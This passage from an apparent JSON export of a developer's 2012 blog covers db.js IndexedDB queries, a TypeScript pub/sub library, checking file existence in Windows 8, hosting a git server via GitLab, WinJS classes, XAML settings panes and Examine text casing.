We can also use that in a range query:\nserver.people .query('age') .bound(25, 35) .distinct() .keys() .execute() .done(function (ages) { //only one entry per age }); This time we’ll know what ages are covered by our data set.\nA key query doesn’t have to be unique though, say you want to know how many entries you have for each key:\nserver.people .query('firstName') .only('Aaron') .keys() .execute() .done(function (names) { //only the keys, if you have multiple entries of one key then you will get multiples in the result set }); This would be useful if you wanted to create a heat map from an index, you could do a map/ reduce to calculate:\nserver.people .query('firstName') .all() .keys() .execute() .done(function (names) { var dataMap = names.map(function(x) { return { key: x, count: 1 }; }); var dataGrouped = {}; dataMap.forEach(function (x) { if (!dataGrouped[x.key]) { dataGrouped[x.key] = x.count; } else { dataGrouped[x.key]++; } }); console.log(dataGrouped); }); Record counting Need to know how many items there are that match a query? Useful if you’re implementing a paging system. Well you could perform your query and check the length of the result set or alternatively you could use the count method and not wait for the entries to be hydrated:\nserver.people .query('firstName') .only('Aaron') .count() .execute() .done(function (count) { //the number of records matching the query }); Note: This time the argument provided to the done handler won’t be an array, it will be a number.\nCompletely custom filtering The indexes in IndexedDB are only single key indexes so there are times that you’re going to be trying to create a query in a way that can’t be done, say you want to query against two properties. Well that’s not going to be possible to do with an index and this is where db.js can help.\nWith db.js there is a filter method that is exposed, this method allows you to provide it with a function that will be used to filter the results, this function must return a boolean result (true if you want the record, false if you don’t). You can add as many of these as you want, but be aware of the performance hit that you may take as essentially they are provided to the Array.filter method:\nserver.people .query('firstName') .only('Aaron') .filter(function (person) { return person.lastName === 'Powell'; }) .execute() .done(function (people) { //only the Aaron Powell's of the world }); Ideally you want to be using this in conjunction with an index. As you’ll see in the above example I’m doing an initial only query to reduce our dataset base on the first names and then doing an additional filter against the persons last name to reduce our dataset event more. The filter method doesn’t have to be applied to an index though, if you don’t have an index that can represent the data you want back (say you’re implementing search) you can call filter directly off the query method.\nConclusionThroughout this post we’ve dived deeper into the query engine of db.js, and by extension got a better understanding of how IndexedDB’s indexes work.\nWe’ve looked at how to create a primary key of such in our object store through the schema mechanism of db.js.\nNext we looked at how to create custom indexes against any property on our object in our store. 
We then took this and looked at how to go about querying against the index in a variety of different ways that are exposed in db.js.\n", "id": "2012-10-02-dbjs-indexes-and-queries" }, { "title": "PubSub in TypeScript", "url": "https://www.aaron-powell.com/posts/2012-10-02-pubsub-in-typescript/", "date": "Tue, 02 Oct 2012 00:00:00 +0000", "tags": [ "typescript", "javascript", "web" ], "description": "It's that time again, time for more Pub/Sub!", "content": "Pub/Sub is my Hello World, I’ve done it not once but twice in JavaScript and once in CoffeeScript (although technically that has a 3rd version in JavaScript at the start of the post :P).\nWell you may have heard of Microsoft’s answer to application-scale JavaScript called TypeScript so I thought I’d write a pub/ sub library in it too.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 module PubSub { var registry = {}; var pub = function(name: string, ...args: any) { if (!registry[name]) return; registry[name].forEach(x => { x.apply(null, args); }); }; var sub = function(name: string, fn: any) { if (!registry[name]) { registry[name] = [fn]; } else { registry[name].push(fn); } }; export var Pub = pub; export var Sub = sub; } It’s pretty simplistic and I’ve gone with using the Array.forEach method rather than just a normal for loop for no reason other than I felt like it.\nIt could be used like so:\n1 2 3 4 5 6 7 8 9 10 11 PubSub.Sub("foo", function(...args: any) { args.forEach(x => { console.log("argument", x); }); }); PubSub.Pub("foo", 1, 2, 3, 4, 5); setTimeout(() => { PubSub.Pub("foo", "a", "b", "c"); }, 1000); See, it’s just a pub/ sub library.\nThere is a few interesting thoughts here though:\nfunction is not valid as an argument constraint I’m assuming that’s just a limitation in the current compiler, you have to use any instead They have splat support, ...args, which is another ES6 proposal and can be quite useful I couldn’t work out how to define a class or interface to accurately represent what registry is, since it’s really an expando object You always have to do export var <member name> = <what to export>, this annoyed me as I like to define everything up front and then later selectively export. I kept getting errors with export pub because I didn’t have a var in there ConclusionFor me it’s pretty meh an experience. I’ve been doing JavaScript for long enough that the features added to language thus far aren’t a really compelling reason to go and write it over JavaScript.\nWhat I have liked is the ability to use ES6 idioms (splats, modules, etc) is nice.\nI’m curious to see what other things it will drive cough source maps cough in the future, but for the time being I’m not going to convert all my JavaScript files over.\n", "id": "2012-10-02-pubsub-in-typescript" }, { "title": "Hello db.js", "url": "https://www.aaron-powell.com/posts/2012-10-01-hello-dbjs/", "date": "Mon, 01 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web", "winjs" ], "description": "An introduction to db.js, an IndexedDB wrapper.", "content": "I’m going to make the assumption you’re somewhat familiar with IndexedDB in this post, if you’re not check out this tutorial.\nIf you’ve spent any time looking at IndexedDB you’ll have to agree that the API leaves a lot to be desired. 
Look IndexedDB is a great feature of modern browsers but the problem is that its API is not really designed around modern JavaScript practices.\nIn particular I really dislike that you have to do stuff like this:\nrequest.onerror = function(event) { // Do something with request.errorCode! }; request.onsuccess = function(event) { // Do something with request.result! }; It really starts getting convoluted when you’re working with the events on the different request objects. Even opening the initial database can be quite ugly, if the version number has changed then you need to handle that event before the success event, doing migrations and all kinds of stuff.\nThe other ugliness starts coming into play when you want to hide your database code behind a public facing API, you’re constantly having to take in callback arguments and it’s Christmas trees all around.\nOn top of this if you look at the code above it feels very reminiscent of old-IE event wire-ups, onclick and all that fun stuff, but today the Promise callback pattern is a much more popular one (you’ve probably seen it in jQuery) as it does a great job of standardizing how you provide callbacks.\nThis was my impression when I started with IndexedDB so I decided that I’d address it in my own way.\nHello db.jsI created a simple little library called db.js which aims to simplify the problems I was finding with IndexedDB’s API. It’s open source, it’s up on GitHub and it’s currently in production running my Pinboard for Windows 8 application.\nAddressing callbacksThe first design goal of db.js was to address the way callbacks were handled. As I said above I really dislike the .onsuccess = function () { ... }; syntax that IndexedDB uses and I really like the Promise API.\nFor db.js I decided that everything would be handled through Promises to keep consistencies with the various callbacks that would be happening. Another decision was that I wouldn’t take a dependency on any existing library that provides a Promise API (like jQuery) to keep db.js as agnostic as possible. So I implemented my own Promise API, as per the CommonJS specification that would power db.js (the Promise spec is pretty easy to implement really).\nOpening a connectionThere’s a few things that you need to do when opening a server connection, you need to:\nProvide the name of the server Provide a schema version If the schema version is newer then you have to handle a schema change Listen of a success or fail method and react accordingly Rather than through a series of properties or arguments that you set I went with an object literal, so creating a connection is like so:\nvar promise = db.open({ server: 'my-app', version: 1, schema: { people: { } } }); This opens a connection to the database server my-app on the current domain and the version of that server is 1, which uses the provided schema, which has a single store (aka, table) called people. If you want more object stores then just add another property to the schema object, each named property becomes an object store name.\nThis returns a Promise object which is implemented as per the CommonJS spec so you have to listen for the success handler to move on:\npromise.done(function (server) { window.server = server; }); It can get a bit tricky there, you don’t have an active server connection until the done function is called. The argument it is provided is a db.js Server object which maintains the active connection. 
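For comparison, here’s a hedged sketch of the kind of raw IndexedDB code that a db.open() call like the one above wraps up (ignoring the vendor prefixes of the era; the store name mirrors the example and the exact internals of db.js are an assumption on my part):

var request = indexedDB.open('my-app', 1);
request.onupgradeneeded = function (e) {
    // fires when the database is new or the version number has been bumped,
    // and is the only place object stores can be created
    e.target.result.createObjectStore('people');
};
request.onsuccess = function (e) {
    window.rawDb = e.target.result; // you have to hold on to this yourself, much like the db.js Server object
};
request.onerror = function (e) {
    console.error('Failed to open the database', e);
};

Either way, the object handed to you in the success path is what you work with from then on.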
Make sure you expose that out otherwise your server connection will be lost!\nNote: Since opening the connection is an asynchronous operation you need to make sure any code that will use the server is told to wait for it. The connection generally opens quickly but when you can use it isn’t known. This is something that can easily trip you up.\nPersisting the connection What you’ll notice from the above code is that it is making the server a global object in my application. The expectation of db.js is that you only ever have one Server object, if you descope it you loose your access to the connection, but this does not close the connection. IndexedDB only allows one connection per server to be open at any given time, so keep that in mind in your application.\nThat said db.js will try and be smart about connection management, it caches the connections internally so if you try and re-open a connection it will return you the existing one.\nClosing the connection Since our connection is a singleton there may be times you don’t need it hanging around, to do this you need to close it off:\nserver.close(); Be aware though that the connection may not close immediately, IndexedDB has steps it must follow to close a connection. Once the connection is closed the Server instance that db.js provided you with will raise an error any time you try and work against it.\nAccessing a storeNow that you have a connection db.js will be smart about what stores you have available. What it does is go through all the stores on your connection and create them as properties of the server, allowing quick access to them. Let’s see how that works by adding some data.\nAdding data IndexedDB has a really nice feature when it comes to adding data (well doing any operation really), it has transaction support! The problem is that because of this everything takes lot more code to do. With db.js this is seemlessly handled for you and when you’re doing bulk inserts it’ll even take care of that:\nvar promise = server.people .add({ firstName: 'Aaron', lastName: 'Powell' }, { firstName: 'John', lastName: 'Smith' }); Here you’ll notice we’re accessing the people property on our server, this tells db.js which of our object stores we want to work against. Next you pass in one or more items that represent the objects you want to store and then the method returns a Promise. To know when you have added all records use a done handler:\npromise.done(function (records, server) { console.log(records); }); The done method will be provided with the records after they go into IndexedDB, this means that if you’re using an auto-incrementing key it’ll have been added to the record so you can then access it.\nNote: I’ll cover off how to set up a key on an object store in a future post.\nPromise progress method If you’ve read the Promise spec you’ll notice that it includes a reference to a progress method. This is used to keep the application “in the loop” when an asynchronous job is running. When you are using the add method in db.js it will trigger the progress method for each record that is inserted. This is because there are two levels of asynchronous jobs happening in the add process, you have the overall transaction status and the individual record status. 
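This is speculative since the post only shows done(), but if the promise follows the CommonJS Promises/A shape it describes, where then() takes success, error and progress handlers, hooking into that per-record notification might look something like this sketch; the helper functions and record variables are hypothetical:

server.people
    .add(record1, record2, record3)      // some large-ish set of records being bulk inserted
    .then(function (records) {
        hideBusyIndicator();             // hypothetical helper: everything is in, let the user move on
    }, function (err) {
        console.error('Insert failed', err);
    }, function (record) {
        updateBusyIndicator(record);     // hypothetical helper: called as each record lands
    });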
I see the main use for this is when you are doing a large insert into IndexedDB (say the first time the user comes to the application) and you want them to know not to hit refresh.\nRemoving data Removing records is just as simple as adding them:\nserver.people .remove(1) .done(function (key) { console.log('removed record with key `1`'); }); You need to provide the key of the record you wish to remove and it’ll go off and do it.\nNote: Currently db.js doesn’t support bulk removal.\nAccessing a record You’ve got a record into your store, how about getting it back out again?\nserver.people .get(1) .done(function (person) { console.log('The person with the primary key `1` is... ', person); }); The get method takes a single key and returns the record that matches it. Essentially it’s a pass through to the native get metohd of IndexedDB.\nAccessing multiple records If you want to get back multiple records db.js has a very extensive query API which supports all of the IndexedDB query methods, as well as adding some additional sugar on top. Here’s a basic “get all” operation:\nserver.people .query() .all() .execute() .done(function (people) { console.log(people); }); There’s a few steps you need to go through, first all the querying is done via the query API. From here we use the all method which is exposed, it tells IndexedDB to get back each record in an unfiltered manner. Once we’re done setting up our query we call the execute method which tells db.js to take the rules we’ve specified and pass them through to IndexedDB. Ultimately a Promise is returned and we can listen for the resulting data.\nThe reason for the execute method is because there’s a lot more we can do from the query. Through this we have a nice fluent chaining API that we can structure our query before it is run. In my next post we’ll look at how to do more powerful querying with db.js.\nConclusionThis has been a very quick overview of db.js and the approach I’ve taken to simplify working with IndexedDB.\n", "id": "2012-10-01-hello-dbjs" }, { "title": "Teched 2012 - HTML & JavaScript Windows 8 apps", "url": "https://www.aaron-powell.com/posts/2012-09-26-teched-2012/", "date": "Wed, 26 Sep 2012 00:00:00 +0000", "tags": [ "auteched", "winjs", "speaking" ], "description": "", "content": "Couldn’t make it to Teched Australia this year?\nMade it and absolutely loved my session?\nWell good news everybody, it’s now online for your viewing pleasure, check it out here.\nThis year my session was looking at doing Windows 8 applications using HTML and JavaScript. Through the session I looked at things that I learnt while building my application, things that you need to watch out for and stuff that just plain sucks.\nHopefully it helps you avoid grief in your on WinJS applications.\n", "id": "2012-09-26-teched-2012" }, { "title": "How to check if a file exists in Windows 8", "url": "https://www.aaron-powell.com/posts/2012-09-24-check-if-file-exists/", "date": "Mon, 24 Sep 2012 00:00:00 +0000", "tags": [ "windows8", "winjs", "c#", "winrt" ], "description": "Ever wondered how to check if a file exists in Windows 8?", "content": "Sometimes things are simple, sometimes they aren’t when you think they should be. One such thing in Windows 8 development is checking if a file exists…\nIn a Windows 8 app (be it C# or JavaScript) you work with the StorageFolder. 
Since we are sandboxed and don’t really have file-system access we don’t have the System.IO namespace we’re used to, meaning we have an entirely new set of APIs for reading and writing files (although it’s nice that they are built around being asynchronous). The fun thing about StorageFolder is it has no method like FileExistsAsync. Yep, there’s no API which will allow you to work out whether a file exists or not…\nSo how do you do it?\nEDD, Exception Driven Development If you’ve done much Windows 8 development you’ll have learnt that a lot of the methods you’d expect to return null values or have a TryGetFoo method will actually raise an exception when the task can’t be completed. StorageFolder is no exception to this rule.\nAlthough I can’t find it documented anywhere it seems that the only way you can check if a file exists is with this:\nStorageFile file; try { file = await ApplicationData.Current.LocalFolder.GetFileAsync("foo.txt"); } catch (FileNotFoundException) { file = null; } It seems to consistently throw the FileNotFoundException when the file doesn’t exist (which I guess makes sense :P), but the problem is that you end up with this try/ catch block where you’re essentially swallowing an exception (and everything in my programming past tells me that that’s a bad idea).\nWell the logic is pretty straightforward so here’s an extension method:\npublic static class StorageFolderExtensions { public static async Task<bool> FileExistsAsync(this StorageFolder folder, string fileName) { try { await folder.GetFileAsync(fileName); return true; } catch (FileNotFoundException) { return false; } } } Or grab the gist.\nWinJS file exists So that above is all well and good in C#/ XAML Windows 8 applications, but what if you’re like me and would prefer to just use WinJS?\nWell the API is slightly less shit for WinJS; true, you still don’t have any easy way to check if a file exists or not, but instead of being exception based it handles it through promises:\nvar folder = Windows.Storage.ApplicationData.current.roamingFolder; folder.getFileAsync('foo.txt').then(function (file) { //process with a valid file }, function (e) { //no file was found }); While this is somewhat nicer as you don’t have to try/ catch the error it’s still not ideal. One of the main problems here is there’s no way to know what error was raised. Since JavaScript doesn’t have typed error handling like C# any error that comes from the getFileAsync method goes into the same error handler. This can be a bit of a pain although I’m struggling to find any documentation on what else could be raised.\nThere are three things you can do in this case:\nAssume that it is the WinJS equivalent of FileNotFoundException and treat all errors the same (this is probably the best way, you don’t have a file, do you really care why?) You can check the message contains something stating the file didn’t exist, but if you do this make sure you’re taking localisation into account! Cast it to its base error type and go from there.
This isn’t overly robust as the best you can do is e instanceof WinRTError as it’s not of type FileNotFoundException If you’re really keen here’s an extension method for doing it in WinJS in a very basic manner (and gist):\nWindows.Storage.StorageFolder.prototype.fileExistsAsync = function(fileName) { var folder = this; return WinJS.Promise(function (complete, error) { folder.getFileAsync(fileName).then(function() { complete(); }, function() { error(); }); }); }; But realistically I wouldn’t bother, since WinJS uses a Promise for this you can pretty easily split out the logic branch between the found/ not found process without the need for an ugly try/ catch block in place. Hell if you don’t want to do anything when there isn’t a file then you can drop the error callback all together and the application will carry on its merry way.\nConclusionThere’s no built in method for determining if a file exists or not from a Windows 8 application using the StorageFolder API. If you’re using C# you’re going to need to handle the FileNotFoundException and go from there. A simple extension method is easy to create if you’re doing a lot of file IO and want to check files exist. WinJS is marginally better though the different async handling but really it’s just hiding the try/ catch away behind another layer. In this case you can provide different callbacks for the different states which can make the code a little cleaner.\n", "id": "2012-09-24-check-if-file-exists" }, { "title": "Running a simple git server on Windows", "url": "https://www.aaron-powell.com/posts/2012-09-21-a-simple-git-server-on-windows/", "date": "Fri, 21 Sep 2012 00:00:00 +0000", "tags": [ "git" ], "description": "How to setup a basic git server for Windows", "content": "While Mercurial still hold a special place in my heart it can’t be denied that Git has well and truly won the war. Because of this I’ve been using it more extensively in the projects that I work on.\nRecently I started on an engagement at work that was using TFS as its SCM, but wanting to avoid some of the pain of TFS 2010 I decided to use git-tf. Things all went smoothly, git was communicating nicely to TFS and children danced around the world.\nWhen the partner who owned the TFS instance rolled off the project the SCM went with them which left me in a pickle, I still had a few weeks left and was looking at the prospect of being SCM-less. For various security reasons I can’t utilise any of the normal hosted SCM’s that I’d go with, so I was left with a problem, I have a complete git history of the project but the only place it lived was on my desktop.\nMaking my own serverHaving used Mercurial for around 3 years now I’m quite familiar with the hg serve command, this is ideal as you run that and you immediately have a basic Mercurial server running that you can push and pull to. This is exactly what I want for git, I’d have a simple server that I can work against and so can the other developer who was coming in few a few days. Unfortunately there is no such command, you do instead have the git daemon, and with a simple command like this:\ngit daemon --reuseaddr --base-path=. --export-all --verbose You’ve got yourself a git server. Yeah go on, remember that off the top of your head (yes you just type it once in as an alias I know I know :P)!\nSo I run my command, have my server ready for connections and then shit gets ugly.\nAs it turns out msysgit, the de-facto Windows git tools, has some real problems with git daemon. 
I was continuously seeing this while trying to clone:\nfatal: read error: Invalid argument Eventually a clone would go through (it’s only a 10mb repo!) but then you’d get a whole different set of problems.\nAgain, as it turns out msysgit doesn’t support pushing to git:// repositories on Windows. Well that just sucks then doesn’t it, it left us with sneakerneting our .git folder so I could maintain the master repository.\nAnd that got old fast!\nNext up, cygwinSo now that msysgit was out the next idea was to use cygwin. I’ve been avoiding installing cygwin on any machines for quite some time now as it really frustrates the hell out of me but I got sent this stack overflow post which made it seem quite easy to get it up and running.\nWell I followed the instructions and started up my sever and it all seemed good, I could pull from it without any problems. Yay!\nBut of course it was time for another problem, I kept having git push hang at 100% of writing objects.\nAgain this seems to be a fairly common problem with git on Windows pushing to cygwin git daemons and to which there’s no decent solution.\nDitching WindowsBasically all my research has suggested to me that the idea of trying to host a git server on Windows is just a bad idea. Sure there were other avenues that I hadn’t tried, such as using a network share to store my git repository and push/ pulling over that, but I didn’t want to futz around with network security here for this task (people also suggested using Dropbox but that is nullified by the fact that the source can’t be hosted outside of the local network), I just wanted a damn git server and my only remaining option that I could see was Linux.\nSince my machine is running Windows 8 I’ve got Hyper-V built in so that’s one problem down, I didn’t have to install VirtualBox (its installer wants me to trust Oracle, I just can’t do that :P) or VMWare Player or anything like that, just enable a Windows feature. The next question, what distro to use…\nWow, there’s a can of worms you can open, ask people what Linux distro to use… I’ll admit that it’s been quite a few years since I last used Linux so I’m not really up with what the kids are using these days but all I want are:\nSomething light-weight, I’m running a Git server on it, that’s all Something easy to setup, I don’t have time (or the desire) to really get in and configure Linux I don’t need a GUI, I’m happy on the command line So ArchLinux and PuppyLinux were two of the top recommended distros, but they’d require a bit of setup to get running. Then a colleague of mine recommended GitLab, a variation of Turnkey that is basically just a pre-built git server. Sweet that sounds exactly like what I want.\nI downloaded GitLab, booted Hyper-V, attached the ISO and kicked off the installer. After being prompted for some credentials to log in and having to use the Legacy Network Adapter in Hyper-V (apparently Turnkey supports the standard one but 5 minutes of configuring modules didn’t work for me so I went ‘meh, legacy it is’ :P) my git server was up and running!\nFor the record my VM specs are a 5GB hard drive and it has 512mb RAM dedicated to it. I was tempted to drop it down to 256mb as it really just idles mostly but I’ve got RAM to spare.\nNext step was to log into the web portal, setup a git project on the server and add my public key and it just worked. Seriously, I was shocked that it was that simple!\nI even managed to get the other developer (who prefers GUI tools over command line, weirdo!) 
setup to use GitHub for Windows against my GitLab server.\nConclusionWant to run a git server on Windows? Don’t bother, install GitLab, it takes about 10 minutes to be up and running with that in a VM.\nThe more I’ve been using GitLab the more I’m liking it, it’s got a nifty little web UI, we can see the repository information, all that fun stuff that distracts you from actually doing work.\n", "id": "2012-09-21-a-simple-git-server-on-windows" }, { "title": "Creating classes in WinJS", "url": "https://www.aaron-powell.com/posts/2012-09-14-creating-classes/", "date": "Fri, 14 Sep 2012 00:00:00 +0000", "tags": [ "winjs", "windows8", "javascript" ], "description": "A look at how you can create JavaScript classes in WinJS", "content": "Sure using classes in JavaScript may not be a great idea, you can’t help but argue that there are valid scenarios which you would be wanting to use the class pattern.\nIf you’re doing WinJS development there’s an API that will allow you to make classes easily, WinJS.Class being the root. From here you can define new classes, derive classes or create mixins.\nCreating a classIt’s very easy to create a class using the WinJS API, here’s a simple person:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }); var me = new Person('Aaron', 'Powell'); console.log(me.firstName + ' ' me.lastName); Not very exciting is it?\nWell let’s say you want to add some instance members:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { sayHello: function () { console.log('Hello there good sir'); } }); var me = new Person('Aaron', 'Powell'); me.sayHello(); The 2nd argument to the define method is a JavaScript object that represents the public instance members which you will have available on your class. There’s also a third argument you can use which allows you to create public static members.\nPowerful properties Something that I found rather cool and not particularly well documented is how the properties are created (both the instance and static properties). Internally they are created using the Object.defineProperties method, and since this is ECMAScript 5 we’re able to do some cool things, such as leveraging the new property features, like so:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { fullName: { get: function () { return this.firstName + ' ' + this.lastName; } } }); What I’ve done here is used a property descriptor to create a read only property which calculates a value based off of other properties on the object. WinJS takes this information and then creates it properly so I can do:\nconsole.log(me.fullName); If I then try and set the value of fullName nothing will happen, it gets ignored.\nYou can also leverage this to create properties with validation in them:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { fullName: { get: function () { return this.firstName + ' ' + this.lastName; } }, age: { get: function () { return this._age; }, set: function (value) { if (value < 0) { throw 'Age must be greater than or equal to 0'; } this._age = value; } }, _age: 0 }); Now I have a more intelligent property in age, it will do validation to make sure that you don’t have a negative age and it stores its information in a pseudo-private property, that being _age.\nPseudo-private property? Huh? 
Since JavaScript doesn’t really have the notion of classes the concept of public/ private members doesn’t exist. You can have things internal to the “constructor” function, but they can’t be accessed outside of that scope. Instead what WinJS does (and many other class pattern libraries) is uses the _ prefix to denote something as private. While this wont actually be private, it’s a bit harder to learn about (Visual Studio intellisense drops any JavaScript members that start with it for example).\nThe other thing that WinJS does to help you hide these members is it will look to see if you’ve provided a property descriptor, and then look for the enumerable property of it (if you don’t have a property descriptor it creates one and sets enumerable to false). When the enumerable property on a descriptor is false (the default too BTW) the property will be skipped when the properties are enumerated by say a for-in loop or Object.keys.\nSo these _-prefixed members are hidden as best as they can be in JavaScript, and it’s really neat that you can use a common coding convention to mark them as hidden rather than having to create a full descriptor yourself.\nDeriving classesSometimes just creating a class isn’t enough, you want to have a base class which you can then derive others from. Again since there’s no class system in JavaScript this isn’t native, but through the use of prototypes you can simulate this inheritance. WinJS provides a simple to use API for doing classical inheritance, WinJS.Class.derive.\nLet’s use the tacky person-employee example for this:\nvar Employee = WinJS.Class.derive(Person, function (firstName, lastName, position) { this.firstName = firstName; this.lastName = lastName; this.position = position; }); For this as you can probably tell you provide the first argument of the method as the base class and then all arguments beyond that are the same as if you’re calling define.\nSide note - if you don’t provide a base class it will pipe the arguments through to the define function anyway.\nSince this inherits from the Person class I have access to all its members so I can call sayHello for example, or set the age of the employee.\nA gotcha with derived classes While working with the derive API I hit a problem, the base class constructor was never called! I had a base class that I defined like this:\nvar Bootstrapper = WinJS.Class.define(function () { var initialised = false; this.init = function () { //do some init stuff //eventually call customInit }; }, { customInit: function () {} }); So this was the bootstrapper for my application but I wanted it so I could create an extended version of it for the different parts so I could bootstrap each individually. I then extended it like so:\nvar MainBootstrapper = WinJS.Class.derive(MyApp.Bootstrapper, function () { }, { customInit: function () { //do some custom stuff } }); new MainBootstrapper().init(); But this crashes, it crashes because init was not found on my MainBootstrapper. Strange, my type inherits from Bootstrapper, if I create an instance of Bootstrapper I get that, so why don’t I have the init method on my derived type?\nWell here’s the problem the “base constructor” is never called. This means that anything done in the constructor of the type you’re inheriting from doesn’t get executed, and since that’s where I was defining my init method it never got added to the object! 
The reason for this is that the derive method only does prototypal inheritance, it doesn’t do constructor inheritance.\nThe easiest way to get around this is to move what you’re setting up in your constructor into being setup in the instance members like the earlier Person example. If this isn’t possible you can solve it in another way by manually calling the base class constructor function yourself, like so:\nvar MainBootstrapper = WinJS.Class.derive(MyApp.Bootstrapper, function () { MyApp.Bootstrapper.apply(this);\t}, { customInit: function () { //do some custom stuff } }); new MainBootstrapper().init(); Here you’ll notice I’m using the apply method to invoke the MyApp.Bootstrapper function. By doing that and passing this into it we’re setting the scope of the function to be the instance of the MainBootstrapper being created, which in turn will perform any logic against it and properly extend the MainBootstrapper object with the base class constructor logic.\nThis is a frustrating problem, it took me ages to work out why my inheritance wasn’t working the way I was expecting it to so watch out if you’re doing classical inheritance in WinJS and wanting constructor inheritance.\nMixinsThe WinJS.Class.mix function is an interesting one and not something that you’ll likely have come across before. What it does is allow you to implement multiple inheritance in JavaScript (and if you’re a .NETter this wont exactly be familiar :P).\nLet’s revisit our Employee example:\nvar payable = { accountNumber: 0, bsb: 0, accountName: '', rate: 150 }; var worker = { expectedHours: 8, worksWeekends: false }; var Employee = WinJS.Class.mix(Person, payable, worker); Here instead of using the derive function I’ve used mix to create our Employee. This time I’ve got a few objects that represent various things that could make up my employee type and I use mix to ultimately put them all together. The first argument is the constructor function which you want to use, so my Person class goes there and then it’s essentially a param[] argument, everything that’s used after the constructor has its properties copied onto the object, building up the members of it. Again this has the same property creation logic as define so you can make pseudo-privates, you can add get/ set bodies, etc.\nConclusionSo this wraps up our look at the WinJS.Class API. I’m not trying to convince you that you should use classes in your JavaScript code but instead have a look a the API for it if/ when you reach the point that you think classes can have benefits inside of your WinJS application.\nI also wanted to document some of the more intelligent features about how you can create classes, that it’s smart enough to look for, and use, the ECMAScript 5 properties as well as taking conventions into account for creating privates. I also wanted to raise the problem that you can hit with the way classical inheritance is implemented in WinJS.\n", "id": "2012-09-14-creating-classes" }, { "title": "The settings suck", "url": "https://www.aaron-powell.com/posts/2012-09-14-settings-suck/", "date": "Fri, 14 Sep 2012 00:00:00 +0000", "tags": [ "xaml", "windows8", "rant" ], "description": "Settings in Windows 8 XAML suck. Period.", "content": "Settings problemsMy first Windows 8 application I wrote using WinJS so a lot of my expectations on how settings worked in Windows 8 XAML was based off of that experience. 
Unfortunately from the looks of it the two teams had very different ideas on whether settings were important or not and thus we have drastically different experiences.\nHere’s the problems I’ve hit so far:\nSetting up settings, if you do this “too early” (ie - before the app has fired off its Activated event) it crashes as the settings pane doesn’t exist There’s no built-in settings control Since there’s no control there’s no way to navigate to a particular settings pane You use an event handler to register settings panes With the exception of the last point (which sucks in both platforms) these are problems specific to XAML based Windows 8 applications. What absolutely baffles me is that there’s no settings stuff built into the platform, seriously, did no one think that that would be important? I mean it’s not like you need to have a section in settings about privacy or anything.\nProblem 1 - No built in controlSo let’s start with the big one, the lack of built in control. It’s reasonably trivial to roll you’re own, as long as you take into account the following things:\nRTL vs LTR displays will open the settings on different sites, make sure you know which side the system settings are opening from and make your settings come from that site as well You’ll want it to animate in, check out the settings on the start screen, they have a nice little fly in so you’ll want to replicate that yourself You’ll want a back button so your user can easily flick back to the overall settings pane Make sure it’s in the allowed widths, either 346 or 646 in width If you want to look into creating it there’s a blog here or the official sample that covers all the steps you’ll be wanting to go through.\nBut realistically don’t roll your own, check out the Callisto. It has a built in settings flyout that works very similar to the one in WinJS which is ace. Maybe the next version will just roll that into the platform.\nProblem 2 - Wiring up settingsSay you want to have a global settings pane, maybe your privacy policy, well you’re going to want to register this in the “global” part of the application. My initial instinct was to do this in the App.xaml.cs constructor. Seemed logical, it was something that I knew would only be executed once and well you’re only registering an event handler through a static so that seemed good enough.\nBut no, no it’s not. The problem is (and it’s not clear to me from the documentation) that SettingsPane.GetForCurrentView() if you don’t have a view (ie - you’re in the App constructor) then it will through a very unhelpful exception. Now sure, this may be me making a mistaken assumption on when you can register settings as in WinJS that’s when you do it (well technically not in a constructor since there’s no constructor really but you do it bright and early)!\nWhen to register So once you learn that you need to do it later the question is when? Well it turns out that this is where you need to be paying attention to the event model of Windows 8 applications, in particular the Activated event. This event is the first point that I’ve been able to find you can register settings panes (or at least access the current view to setup the event handler).\nIdeally you also want to check the ActivationKind so you only register when your application first launches and not other times to avoid duplicate registration.\nNon-global settings Sometimes you might want settings which are not always there. 
Say you’ve got some context-specific help that you want the users to be able to access, there’d be no point having that available from every screen as it might introduce confusion about what the context is.\nWell it turns out you can unregister settings panes by simply removing the event handler, so if you’ve got this:\nSettingsPane.GetForCurrentView().CommandRequested += OnCommandRequested If you then remove that event handler:\nSettingsPane.GetForCurrentView().CommandRequested -= OnCommandRequested Any settings created there are automatically removed.\nThe ideal way to use this would be inside your OnNavigatedTo and OnNavigatedFrom methods (which come from the Page base class) you add/ remove the event handlers.\nProblem 3 - NavigationSince there’s no built-in control and no real settings concept in the platform you can’t “go to” a settings pane. Coming from WinJS I found SettingsFlyout.showSettings really quite useful, but since there’s no comparative API in XAML you’re pretty much stuffed.\nSo far the best answer I’ve got from anyone on how to do this is to make your settings flyout (the one from Callisto) a “global” variable so you can change the IsOpen property of it to programmatically show it.\nNow that just plain sucks.\nConclusionYes this was mostly a rant. As I keep saying the settings in Windows 8 XAML sucks. There’s some very pointy edges, particularly when you are comparing the experience to the WinJS experience.\nMy tips are:\nUse Callisto, it’s got a great control for doing settings (and many other good controls)\nKnow when and where you need to wire up your event handlers, ideally the Activated event but you can scope them to a particular page\nTry to avoid a UX which requires the users to be forced into the settings, have it discoverable and intuitive for them\n", "id": "2012-09-14-settings-suck" }, { "title": "Text casing and Examine", "url": "https://www.aaron-powell.com/posts/2012-09-05-text-casing-and-examine/", "date": "Wed, 05 Sep 2012 00:00:00 +0000", "tags": [ "lucene.net", "examine", "umbraco" ], "description": "", "content": "A few times I’ve seen questions posted on the Umbraco forums which ask how to deal with case insensitivity text with Examine, and it’s also something that we’ve had to handle a few times within our own company.\nHere’s a scenario:\nYou have a site search You use examine You want to show the results looking exactly the same as it was before it went into Examine If you’re running a standard install you’ll notice that the content always ends up lowercased!\nThis is a bit of a problem, page titles will be lowercase, body content will be lowercase, etc. Part of this will be due to a mistake in Examine, part of it is due to the design of Lucene.\nIn this article I’ll have a look at what you need to do to make it work as you’d expect.\nFirst, some background Before we dive directly into what to do to fix it you really should understand what is happening. If you don’t care feel free to skip over this bit though :P.\nSearching is a tricky thing, and when searching the statement Examine == examine == false; To get around this searching is best done in a case insensitive manner. To make this work Examine did a forced lowercase of the content before it was pushed into Lucene.Net. This was to ensure that everything was exactly the same when it was searched against. 
